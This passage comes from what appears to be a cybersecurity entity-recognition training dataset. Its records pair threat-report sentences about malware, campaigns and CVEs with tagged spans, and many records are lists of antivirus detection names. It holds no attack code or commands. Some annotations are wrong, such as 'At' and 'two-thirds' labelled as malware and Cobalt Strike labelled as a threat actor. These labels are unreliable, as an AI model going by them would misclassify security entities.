"info": {"id": "cyner2_train_002026", "source": "cyner2_train"}} {"text": "MrWhite can profile the victim systems for the presence of running POS software before 
dropping further POS payloads.", "spans": {"MALWARE: MrWhite": [[0, 7]], "SYSTEM: victim systems": [[24, 38]], "SYSTEM: POS software": [[67, 79]], "MALWARE: POS payloads.": [[104, 117]]}, "info": {"id": "cyner2_train_002027", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.48F3 Trojan.Kazy.D8696E Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_CRYPCTB.SME Troj.Downloader.W32.FraudLoad.kYSC TROJ_CRYPCTB.SME BehavesLike.Win32.Upatre.tc Trojan:Win32/Triflearch.B Trojan.FakeAV.01657 Win32.Trojan.Crypt.Dzag Trojan.Win32.Crypt Win32/Trojan.8cf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002028", "source": "cyner2_train"}} {"text": "Malicious code identified, simple UDP DDoS attacks recorded.", "spans": {"MALWARE: Malicious code": [[0, 14]]}, "info": {"id": "cyner2_train_002029", "source": "cyner2_train"}} {"text": "It steals sensitive information, such as cryptocurrency wallet data, from different applications and uses a file grabber for collecting a predefined list of file types, then exfiltrates them via Telegram.", "spans": {"SYSTEM: cryptocurrency wallet": [[41, 62]], "SYSTEM: applications": [[84, 96]], "SYSTEM: file grabber": [[108, 120]], "SYSTEM: Telegram.": [[195, 204]]}, "info": {"id": "cyner2_train_002032", "source": "cyner2_train"}} {"text": "Forcepoint Security Labs™ have observed today a major malicious email campaign from the Necurs botnet spreading a new ransomware which appears to call itself Jaff peaking within our telemetry at nearly 5m emails per hour.", "spans": {"ORGANIZATION: Forcepoint Security Labs™": [[0, 25]], "THREAT_ACTOR: major malicious email campaign": [[48, 78]], "MALWARE: the Necurs botnet": [[84, 101]], "MALWARE: ransomware": [[118, 128]], "MALWARE: Jaff": [[158, 162]], "SYSTEM: telemetry": [[182, 191]]}, "info": {"id": "cyner2_train_002033", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Downloader.Dapato.cjt Trojan.Kryptik!UYVcX29KF20 W32/Krypt.DZ 
Trojan.Win32.Cleaman!IK TrojWare.Win32.Kryptik.ZLB Trojan.DownLoad2.49842 TR/FakeAV.bzqra TrojanDownloader.Dapato.ace TrojanDownloader:Win32/Cred.B Trojan/Win32.Menti TrojanDownloader.Dapato.cfq Trojan.Win32.Cleaman W32/Kryptik.ACD!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002034", "source": "cyner2_train"}} {"text": "PwC's cyber security practice has worked closely with BAE Systems and other members of the security community, along with the UK's National Cyber Security Centre NCSC, to uncover and disrupt what is thought to be one of the largest ever sustained global cyber espionage campaigns in an operation referred to as Operation Cloud Hopper'.", "spans": {"ORGANIZATION: PwC's cyber security": [[0, 20]], "ORGANIZATION: BAE Systems": [[54, 65]], "ORGANIZATION: the security community,": [[87, 110]], "ORGANIZATION: the UK's National Cyber Security Centre NCSC,": [[122, 167]], "THREAT_ACTOR: global cyber espionage campaigns": [[247, 279]], "THREAT_ACTOR: Operation Cloud Hopper'.": [[311, 335]]}, "info": {"id": "cyner2_train_002037", "source": "cyner2_train"}} {"text": "If some malware samples remain simple see my previous diary, others try to install malicious files in a smooth way to the victim computers.", "spans": {"MALWARE: malware": [[8, 15]], "SYSTEM: the victim computers.": [[118, 139]]}, "info": {"id": "cyner2_train_002038", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Kazy.D55679 Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Starter.cuyepr Trojan.Starter.2890 BehavesLike.Win32.Trojan.vm Trojan.Dropper MSIL/Injector.WSX!tr Win32/Trojan.e6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002039", "source": "cyner2_train"}} {"text": "Among their most notable presumed targets are the American Democratic National Committee, the German parliament and the French television network TV5Monde.", "spans": {"ORGANIZATION: the American Democratic National Committee, the 
German parliament": [[46, 111]], "ORGANIZATION: the French television network TV5Monde.": [[116, 155]]}, "info": {"id": "cyner2_train_002041", "source": "cyner2_train"}} {"text": "BlackEnergy is a Trojan that was created by a hacker known as Cr4sh.", "spans": {"THREAT_ACTOR: BlackEnergy": [[0, 11]], "MALWARE: Trojan": [[17, 23]], "THREAT_ACTOR: hacker": [[46, 52]], "THREAT_ACTOR: Cr4sh.": [[62, 68]]}, "info": {"id": "cyner2_train_002044", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Sylavriu BKDR_SYLAVRIU.SM Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.Zbot BKDR_SYLAVRIU.SM Win.Trojan.Torct-1 W32.Trojan.Torct Trojan/MSIL.Crypt Trojan.MSIL.Krypt.2 Backdoor:MSIL/Sylavriu.A Dropper/Win32.Adminuser.R118179 Trojan.MSIL.Crypt Trojan.Crypt!ZlAnMaNuAFw Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002045", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.Redsip!O Trojandropper.Redsip Backdoor.Redsip.k Backdoor.Redsip.Win32.8 Backdoor/Redsip.k Win32.Trojan.WisdomEyes.16070401.9500.9970 W32/Backdoor2.HIOH Hacktool.Keylogger Win32/Redsip.A Backdoor.Win32.Redsip.a Trojan.Win32.Redsip.dcevd Backdoor.Win32.A.Redsip.159744 Backdoor.W32.Redsip.k!c BehavesLike.Win32.Ramnit.ct W32/Backdoor.VDXS-0842 BDS/Redsip.B W32/Redsip.A!tr Trojan[Backdoor]/Win32.Redsip Backdoor.Win32.Redsip.a TrojanDropper:Win32/Redsip.B Trojan/Win32.Redsip.C245513 Backdoor.Redsip Win32/Redsip.AA Win32.Backdoor.Redsip.Amvr Backdoor.Win32.Redsip", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002050", "source": "cyner2_train"}} {"text": "Phony Tech Support Scams Now Target Macs", "spans": {"THREAT_ACTOR: Phony Tech Support": [[0, 18]], "SYSTEM: Macs": [[36, 40]]}, "info": {"id": "cyner2_train_002051", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Hexzone.bdlvxl Adware.Margoc MalCrypt.Indus! 
VirTool.Win32.Obfuscator.a Trojan:Win32/Procesemes.A.dll Trojan/Win32.Xema Adware.Margoc!rem", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002054", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom.Urausy.E4 Ransom_Urausy.R038C0CB418 Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Ransomlock.Q Ransom_Urausy.R038C0CB418 Trojan.Win32.Winlock.crahoz TrojWare.Win32.FakeAv.ASC Trojan.Winlock.9260 Trojan/Foreign.shn Ransom:Win32/Urausy.E Trojan.Zusy.D10991 Trojan/Win32.Foreign.R84961 SScope.Malware-Cryptor.Hlux Win32/LockScreen.AQD Trojan.Win32.Urausy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002055", "source": "cyner2_train"}} {"text": "In addition, HummingBad installs fraudulent apps to increase the revenue stream for the fraudster.", "spans": {"MALWARE: HummingBad": [[13, 23]], "THREAT_ACTOR: fraudster.": [[88, 98]]}, "info": {"id": "cyner2_train_002056", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32/SillyDl.XXJ!packed Trojan-Dropper.Win32.Dorifel.acvt Trojan.DownLoader1.46415 BehavesLike.Win32.Adware.cc TrojanDownloader:Win32/Plingky.A Trojan.Heur.EDD31E Trojan-Dropper.Win32.Dorifel.acvt Trojan-Downloader.Win32.Small W32/Dorifel.ACVT!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002059", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Clicker.BHO.ncx Trojan.Zbot Win32/TrojanClicker.BHO.NCX TROJ_SPNR.30BB13 Trojan.Win32.Starter.amcr Trojan.Win32.Starter.dzdloa Win32.Trojan.Starter.Suef TROJ_SPNR.30BB13 BehavesLike.Win32.Downloader.gh TR/Lickore.B.7 W32/TrojanClicker_BHO.NCX PUP/Win32.Msbuyn.N640533768 Trojan:Win32/Lickore.B Win32/Lickore.B Trojan-Clicker.BAHK Clicker.BAHK", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002060", "source": "cyner2_train"}} {"text": "The command and control C&C communications for new variants use the same AES256 encryption for any traffic to the attacker's 
server; in previous variants, only Base64 encoding was used.", "spans": {"MALWARE: variants": [[51, 59]], "SYSTEM: server;": [[125, 132]]}, "info": {"id": "cyner2_train_002061", "source": "cyner2_train"}} {"text": "Disttrack is a multipurpose tool that exhibits worm-like behavior by attempting to spread to other systems on a local network using stolen administrator credentials.", "spans": {"MALWARE: Disttrack": [[0, 9]], "MALWARE: tool": [[28, 32]], "MALWARE: worm-like": [[47, 56]], "SYSTEM: systems": [[99, 106]], "SYSTEM: local network": [[112, 125]]}, "info": {"id": "cyner2_train_002062", "source": "cyner2_train"}} {"text": "Since the beginning of January 2017, the BSI, as the national cyber security agency, has been in close contact with the German Bundestag, due to the network traffic of the German Bundestag.", "spans": {"ORGANIZATION: BSI,": [[41, 45]], "ORGANIZATION: the national cyber security agency,": [[49, 84]], "ORGANIZATION: the German Bundestag,": [[116, 137]], "SYSTEM: network traffic": [[149, 164]], "ORGANIZATION: the German Bundestag.": [[168, 189]]}, "info": {"id": "cyner2_train_002063", "source": "cyner2_train"}} {"text": "Additionally, when we searched for the decoded string value we found a single search engine result that pointed to a Pastebin page.", "spans": {"SYSTEM: search engine": [[78, 91]]}, "info": {"id": "cyner2_train_002064", "source": "cyner2_train"}} {"text": "First, Winnti uses Cobalt Strike to collect credentials and move laterally.", "spans": {"THREAT_ACTOR: Winnti": [[7, 13]], "THREAT_ACTOR: Cobalt Strike": [[19, 32]]}, "info": {"id": "cyner2_train_002065", "source": "cyner2_train"}} {"text": "At the time of investigation this malware was not correctly detected by any existing antivirus engines, and domains / IP s were not found in any commercial threat intelligence feeds.", "spans": {"MALWARE: At": [[0, 2]], "MALWARE: malware": [[34, 41]], "SYSTEM: antivirus engines,": [[85, 103]], "ORGANIZATION: commercial threat intelligence 
feeds.": [[145, 182]]}, "info": {"id": "cyner2_train_002066", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Razy.D31A9 Win32.Trojan.WisdomEyes.16070401.9500.9960 TROJ_HOYGUNER.SM Trojan.Win32.Drop.dhxynu TROJ_HOYGUNER.SM Virus.MSIL W32.Trojan.Dropper Trojan:MSIL/Hoygunver.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002067", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DeadBeef.Worm Worm/W32.AutoRun.175104 Worm.Win32.AutoRun!O Worm.AutoRun.Win32.8121 W32/AutoRun.pv W32.SillyFDC Win32/Wainlas.A WORM_AUTORUN_000002c.TOMA Win.Worm.Autorun-1414 Worm.Win32.AutoRun.pv Trojan.Win32.AutoRun.ltul Win32.Worm.Autorun.Tbim Worm.Win32.AutoRun.~MAA Win32.HLLW.Autoruner.748 WORM_AUTORUN_000002c.TOMA Worm/AutoRun.bhu TR/Drop.AutoRun.BM Worm/Win32.AutoRun Worm.Win32.Autorun.12728 Worm.Win32.AutoRun.pv Worm/Win32.AutoRun.R16694 Worm.AutoRun Worm.Win32.AutoRun W32/AutoRun.NTQ!worm Trj/Debat.A Trojan.PSW.Win32.QQPass.CF", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002068", "source": "cyner2_train"}} {"text": "During the WannaCry pandemic attack, CyphortLabs discovered that other threat actors have been using the same EternalBlue exploit to deliver other malware.", "spans": {"MALWARE: WannaCry": [[11, 19]], "ORGANIZATION: CyphortLabs": [[37, 48]], "ORGANIZATION: threat actors": [[71, 84]], "MALWARE: same EternalBlue exploit": [[105, 129]], "MALWARE: malware.": [[147, 155]]}, "info": {"id": "cyner2_train_002069", "source": "cyner2_train"}} {"text": "Although bitcoin miners have been used by cybercriminals before as a way to monetize their malicious activities, this recent sample MD5: 522f8ba8b2dec299cc64c0ccf5a68000 caught our attention because it is unusually heavy, persistent, and obfuscated.", "spans": {"MALWARE: bitcoin miners": [[9, 23]], "THREAT_ACTOR: cybercriminals": [[42, 56]]}, "info": {"id": "cyner2_train_002070", "source": "cyner2_train"}} {"text": "A backdoor also known 
as: W32.kowinHA.Worm Backdoor.Win32.Popwin!O Trojan.Heur.amuaxSBiYpji Win32.Trojan.WisdomEyes.16070401.9500.9769 W32.Popwin Win32/Pipown.NW TROJ_NSPAK.A Trojan.Win32.Popwin.jgms Constructor.W32.VB.lgxd Backdoor.Win32.Popwin.~IQ Trojan.Popwin TROJ_NSPAK.A BehavesLike.Win32.Downloader.lc Trojan/PSW.GamePass.pjs Worm:Win32/Winko.A Backdoor.Popwin Worm.Win32.AutoRun W32/Winko.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002071", "source": "cyner2_train"}} {"text": "The two 0-days in question targeted Adobe Flash and were subsequently labeled CVE-2015-5119 and CVE-2015-5122.", "spans": {"VULNERABILITY: 0-days": [[8, 14]], "SYSTEM: Adobe Flash": [[36, 47]]}, "info": {"id": "cyner2_train_002072", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Fakedos.A Backdoor.Fakedos!ktjmxmN20Kc W32/Backdoor.MDB Backdoor.Trojan BKDR_BACKDOOR4.B Backdoor.Win32.Fakedos.a Backdoor.Fakedos.A Backdoor.Fakedos.A Backdoor.Fakedos.A Email-Worm.Win32.GOPworm.196 BDS/Fakedos.A.1 BKDR_BACKDOOR4.B Win32.Hack.Fakedos.a.kcloud Backdoor.Fakedos.A W32/Backdoor.CVVK-7742 Win-Trojan/Fakedos.94208 TScope.Trojan.VB PE:Backdoor.Fakedos.a!1073830334 BackDoor.Fakedos.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002074", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.44AD Win32.Virus.Downloader.Aojh Trojan-Downloader.Win32.Cekar W32/Noia.B Trj/CI.A Win32/Trojan.dd1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002078", "source": "cyner2_train"}} {"text": "Used in Pawn Storm to target certain foreign affairs ministries, the vulnerability identified as CVE-2015-7645 represents a significant change in tactics from previous exploits.", "spans": {"THREAT_ACTOR: Pawn Storm": [[8, 18]], "ORGANIZATION: foreign affairs ministries,": [[37, 64]], "VULNERABILITY: vulnerability": [[69, 82]], "VULNERABILITY: exploits.": [[168, 177]]}, "info": {"id": "cyner2_train_002079", 
"source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.D995 Virus.Win32.Sality!O Backdoor.PMax Trojan.Win32.PMax.deplgs Backdoor.Win32.PMax.atcf MULDROP.Trojan BehavesLike.Win32.Downloader.mc W32/Poweliks.A!tr Trojan.Zusy.D19DC7 Trojan/Win32.VBKrypt Trojan:Win32/Powessere.A Backdoor.PMax Trojan.Poweliks Trojan.Win32.Poweliks.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002087", "source": "cyner2_train"}} {"text": "Over the past few months, the tr1adx team has been tracking a Threat Actor which we codenamed TelePort Crew.", "spans": {"ORGANIZATION: tr1adx team": [[30, 41]], "THREAT_ACTOR: Threat Actor": [[62, 74]], "THREAT_ACTOR: TelePort Crew.": [[94, 108]]}, "info": {"id": "cyner2_train_002088", "source": "cyner2_train"}} {"text": "The infection vector was a drive-by download attack, and the Check Points Threat-Cloud indicates some adult content sites served the malicious payload.", "spans": {"VULNERABILITY: The infection vector": [[0, 20]], "ORGANIZATION: the Check Points Threat-Cloud": [[57, 86]], "MALWARE: malicious payload.": [[133, 151]]}, "info": {"id": "cyner2_train_002091", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Motd.A Backdoor.Motd.A Trojan.Win32.Malware.a Backdoor.Trojan Backdoor.Motd.A Backdoor.Win32.MOTD Backdoor.Motd.A Trojan.Win32.MOTD.glgl Troj.Spy.W32.Delf.mczC Backdoor.Motd.A Backdoor.Motd.A BackDoor.Motd Backdoor.MOTD.Win32.1 BehavesLike.Win32.Ipamor.hh Backdoor.Win32.Y3KRat Trojan[Backdoor]/Win32.MOTD Backdoor.Motd.A Backdoor.Win32.MOTD Trojan.Win32.Malware.a Backdoor.MOTD", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002092", "source": "cyner2_train"}} {"text": "CloudDuke also greatly expands on the Duke group's usage of cloud storage services, specifically Microsoft's OneDrive, as a channel for both command and control as well as the exfiltration of stolen data.", "spans": {"MALWARE: CloudDuke": [[0, 9]], "ORGANIZATION: Duke 
group's": [[38, 50]], "SYSTEM: Microsoft's OneDrive,": [[97, 118]]}, "info": {"id": "cyner2_train_002093", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Crypt.CG Downloader.Vidlo.Win32.11 Backdoor.W32.IRCBot.mA1F Trojan.Crypt.CG Win32.Trojan.WisdomEyes.16070401.9500.9959 W32/Downloader.PQKB-6890 Win32/InjectDown.B TROJ_DLOADER.JR Win.Downloader.Small-886 Trojan-Downloader.Win32.Vidlo.k Trojan.Crypt.CG Trojan.Crypt.CG TrojWare.Win32.TrojanDownloader.Vidlo.K Trojan.Crypt.CG Trojan.DownLoader.3548 TROJ_DLOADER.JR Packer.Win32.Mondera W32/Downloader.BEC TrojanDownloader.Small.zu TR/Dldr.Vidlo.K Trojan[Downloader]/Win32.Vidlo Win32.Troj.Vidlo.k.kcloud TrojanDownloader:Win32/Vidlo.I Trojan.Win32.A.Downloader.3584.CB Trojan-Downloader.Win32.Vidlo.k Trojan.Crypt.CG Trojan.Crypt.CG TScope.Malware-Cryptor.SB Win32/TrojanDownloader.Vidlo.K", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002094", "source": "cyner2_train"}} {"text": "All the text is then copied and - again hidden in the background - sent to a foreign server.", "spans": {}, "info": {"id": "cyner2_train_002095", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Black.r5 Trojan.Win32.Black.deckbe Backdoor.Vinself.C Win32/Leouncia.D TROJ_ORCARAT.A Packed.Win32.Black.d Packed.Win32.Aspack.AB Trojan.DownLoader11.40855 Trojan.Packed.Win32.43496 TROJ_ORCARAT.A BehavesLike.Win32.Dropper.fc W32/Trojan.QUXL-7354 Packed.Black.ahku W32/Black.D!tr Trojan.Heur.wuXa774c9jj Packer.W32.Black.d!c VirTool:Win32/Obfuscator.XY Win32.Packed.Black.Ebzx Trojan-Downloader.Win32.Banload Trojan.Win32.Black.d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002097", "source": "cyner2_train"}} {"text": "Upon successful exploitation, a new process is created with the PE file embedded in the uploadpref.dat file.", "spans": {"MALWARE: exploitation,": [[16, 29]]}, "info": {"id": "cyner2_train_002098", "source": "cyner2_train"}} {"text": "A backdoor 
also known as: Trojan.ScriptKD.6648 Trojan.Tiggre Trojan.ScriptKD.6648 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan-Downloader.VBS.Small.l Trojan.Script.Small.dczplj Trojan.ScriptKD.6648 Tool.BtcMine.1036 BehavesLike.Win32.AdwareLinkury.hc W32/Trojan.LHYZ-8303 Trojan[Downloader]/Win32.Betload TrojanDownloader:Win32/Streamto.A Zum.BitCoinMiner.1 Trojan-Downloader.VBS.Small.l Zum.BitCoinMiner.1 Trojan.ScriptKD.6648 Trojan.ScriptKD.6648 Trj/CI.A Trojan.Bitcoinminer Vbs.Trojan-downloader.Small.Stty Trojan-Downloader.VBS.Small.L Win32/Trojan.f11", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002099", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/Bifrose.sxu Win32.Trojan.WisdomEyes.16070401.9500.9583 W32/Backdoor.BVIJ-4494 BKDR_BIFROSE_0000025.TOMA Win.Trojan.Bifrose-3481 Trojan.Win32.Bifrose.isow Backdoor.Win32.A.Bifrose.51712.B[h] Trojan.MulDrop.16295 Backdoor.Bifrose.Win32.79774 W32/Backdoor2.BVUS Backdoor/SdBot.ees WORM/IrcBot.353792 Trojan[Backdoor]/Win32.Bifrose Trojan:Win32/Mdrop.A Backdoor/Win32.Bifrose.C64544 Backdoor.Bifrose!Gi2ynDtXmII Backdoor.Win32.Bifrose", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002100", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.PDF.Phishing.UX Trojan.PDF.Phish.ve Trojan.PDF.Phishing.UX Trojan.PDF.Phishing.UX EXP/Pidief.EB.523 Trojan.PDF.Phishing.UX Trojan.PDF.Phish.ve Trojan.PDF.Phishing.UX Trojan.PDF.Phishing.UX", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002102", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Worm/W32.Small.6084.H Email-Worm.Win32.Zhelatin!O Email-Worm.Win32.Zhelatin.h W32.W.Zhelatin.l03u TrojWare.Win32.Small.DBY Worm.Zhelatin.Win32.4001 Downloader-BAI.dam Worm/Zhelatin.ok TR/Small.DBY.Y Worm[Email]/Win32.Zhelatin Email-Worm.Win32.Zhelatin.h Win32/Luder.O Downloader-BAI.dam Email-Worm.Win32.Zhelatin W32/DldBAI.H!dam Trj/Alanchum.PH", 
"spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002103", "source": "cyner2_train"}} {"text": "The Locky ransomware has been very active since its return which we documented in a previous blog post.", "spans": {"MALWARE: The Locky ransomware": [[0, 20]]}, "info": {"id": "cyner2_train_002104", "source": "cyner2_train"}} {"text": "About two-thirds of these apps show some kind of malicious behavior, including displaying ads and downloading apps without the user's consent.", "spans": {"MALWARE: two-thirds": [[6, 16]], "MALWARE: apps": [[26, 30]], "MALWARE: malicious behavior,": [[49, 68]]}, "info": {"id": "cyner2_train_002105", "source": "cyner2_train"}} {"text": "However, we just recently found new Sage samples that, while they appear to still be Sage 2.2, now have added tricks focused on anti-analysis and privilege escalation.", "spans": {"MALWARE: Sage samples": [[36, 48]], "MALWARE: Sage 2.2,": [[85, 94]], "VULNERABILITY: privilege escalation.": [[146, 167]]}, "info": {"id": "cyner2_train_002106", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Spamtool.Y Trojan.Dropper Win32/Mendrem.A Win.Trojan.Proxy-4705 Troj.Proxy.W32!c Trojan.MulDrop.4012 BehavesLike.Win32.Backdoor.cm Trojan-Downloader.Win32.LoadAdv W32/Spamtool.LPPN-6055 Spammer:Win32/Kukunefo.A TScope.Malware-Cryptor.SB Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002107", "source": "cyner2_train"}} {"text": "When the files are encrypted they DO NOT change file name or extensions and appear normal to the victim until you try to open them.", "spans": {}, "info": {"id": "cyner2_train_002108", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.NForwarded.401408.F Trojan.Beaugrit.A.mue Trojan/Spy.Banhguo.a Win32.Trojan-Spy.Banhguo.a Trojan.Win32.KillFiles.dmlrmm Trojan.Win32.PSWIGames.401408.J TrojWare.Win32.Lmir.RL Trojan.KillFiles.17459 Backdoor.PePatch.Win32.55641 BehavesLike.Win32.Dropper.fc TR/Banhguo.aone 
Trojan.Symmi.DBA11 Trojan/Win32.OnLineGames.R127640 W32/Banhguo.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002112", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Virus.W32.Hupigon.Fqm!c BehavesLike.Win32.RAHack.fc KIT/Mac.Walrus.121 HackTool[Constructor]/Win32.Walrus Constructor:W97M/Walrus.1_21.dam#2 Trj/CI.A Win32/Trojan.488", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002113", "source": "cyner2_train"}} {"text": "A backdoor also known as: Uds.Dangerousobject.Multi!c Win32.Trojan.WisdomEyes.151026.9950.9988 Heur.AdvML.C Trojan.Win32.MulDrop5.dbmdce BehavesLike.Win32.BrowseFox.nh W32/CoinMiner.QR!tr Trojan.Zusy.D17C80 PUP/Win32.BitCoinMiner.C350160 Trojan:Win32/Figyek.A Win32.Trojan.Adware.Wnmi Trojan.CoinMiner CoinMiner.BLK Trojan.Win32.CoinMiner.QR Win32/Trojan.713", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002115", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Packed.Krap.b.3 Packer.Malware.NSAnti.1 Trojan:Win32/Inhoo.A Packer.Malware.NSAnti.1 Trojan-GameThief.Win32.Magania.aigw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002116", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dropper.Axesoft.A Trojan-Dropper/W32.Axesoft.800094 Trojandropper.Axesoft Trojan.Dropper.Axesoft.A Trojan/Dropper.Axesoft TROJ_AXESOFT.A TROJ_AXESOFT.A Trojan.Dropper.Axesoft.A Trojan-Dropper.Win32.Axesoft Trojan.Dropper.Axesoft.A Trojan.Win32.Axesoft-Drp.fdro Troj.Dropper.W32.Axesoft!c Trojan.Dropper.Axesoft.A Trojan.Dropper.Axesoft.A Trojan.MulDrop.216 Dropper.Axesoft.Win32.2 BehavesLike.Win32.Dropper.bc Trojan-PWS.Win32.QQPass W32/Trojan.RHJF-8903 TrojanDropper.Axesoft W32.Trojan.Dropper-AxeSoft BDS/GWGirl.12.C Trojan.Dropper.Axesoft.A Trojan-Dropper.Win32.Axesoft BackDoor-SP.dr TrojanDropper.Axesoft Win32/TrojanDropper.Axesoft Win32.Trojan-dropper.Axesoft.Apde 
Trojan.DR.Axesoft!crjcgQTkDRg W32/Bdoor.SP!tr Win32/Trojan.Dropper.d68", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002117", "source": "cyner2_train"}} {"text": "Initial reports of a new variant of ransomware called LockCrypt started in June of this year.", "spans": {"MALWARE: new variant": [[21, 32]], "MALWARE: ransomware": [[36, 46]], "MALWARE: LockCrypt": [[54, 63]]}, "info": {"id": "cyner2_train_002118", "source": "cyner2_train"}} {"text": "But the 3rd ASEAN-United States Summit on 21 November 2015 did not disappoint.", "spans": {"ORGANIZATION: 3rd ASEAN-United States Summit": [[8, 38]]}, "info": {"id": "cyner2_train_002119", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGamesLT180912HKGHAAI.Trojan Trojan-Downloader.Win32.Losabel!O Downloader.Losabel.Win32.540 Trojan/Downloader.Losabel.nx Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Popwin BehavesLike.Win32.Trojan.fh TrojanDownloader.Losabel.cx Trojan[Downloader]/Win32.Losabel TrojanDropper:Win32/Idicaf.A Trojan/Win32.OnlineGameHack.C187141 Trojan.DL.Losabel!C2fG9tSV6gk Trj/Pupack.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002121", "source": "cyner2_train"}} {"text": "It appears to be run by a Russian-speaking group of hackers.", "spans": {"THREAT_ACTOR: Russian-speaking group of hackers.": [[26, 60]]}, "info": {"id": "cyner2_train_002124", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Kazy.D54BC4 Win32.Trojan.WisdomEyes.16070401.9500.9993 Tool.PassView.859 Trojan/Blocker.jhq Win32.Troj.Foxhiex.a.kcloud Trojan/Win32.Zbot.C284570 Trojan.MSIL.CryptoObfuscator Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002125", "source": "cyner2_train"}} {"text": "A backdoor also known as: P2P-Worm.Win32.Krepper!O Worm.Krepper.A.mue Worm.Krepper.Win32.1 W32/Krepper.c W32.IRCBot Win32/Sndc.A WORM_SHAREBOT.A Win.Worm.Poom-1 P2P-Worm.Win32.Krepper.c Trojan.Win32.Krepper.dqeaqt 
Troj.GameThief.W32.OnLineGames.lgKp Win32.Worm-p2p.Krepper.Ljjq Worm.Win32.Krepper.C Win32.HLLW.Krepper WORM_SHAREBOT.A BehavesLike.Win32.PUPXAX.lz W32/Pcbot.A@p2p Trojan/Krepper.ad WORM/Krepper.C Worm[P2P]/Win32.Krepper Worm:Win32/Krepper.B Trojan.Win32.Krepper.11808 P2P-Worm.Win32.Krepper.c Worm.Krepper I-Worm.Krepper.C Win32/Krepper.C Worm.P2P.Krepper!dcAWP425Bzk P2P-Worm.Win32.Krepper W32/Krepper.C!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002126", "source": "cyner2_train"}} {"text": "Through our on-going investigation and monitoring of this targeted attack campaign, we found suspicious URLs that hosted a newly discovered zero-day exploit in Java now identified by Oracle as CVE-2015-2590.", "spans": {"THREAT_ACTOR: attack campaign,": [[67, 83]], "VULNERABILITY: zero-day exploit": [[140, 156]], "SYSTEM: Java": [[160, 164]], "ORGANIZATION: Oracle": [[183, 189]]}, "info": {"id": "cyner2_train_002130", "source": "cyner2_train"}} {"text": "The campaign was identified starting with the registration on 2023-04-05 16:04:51 up to the latest registration on 2023-04-10 08:33:28.", "spans": 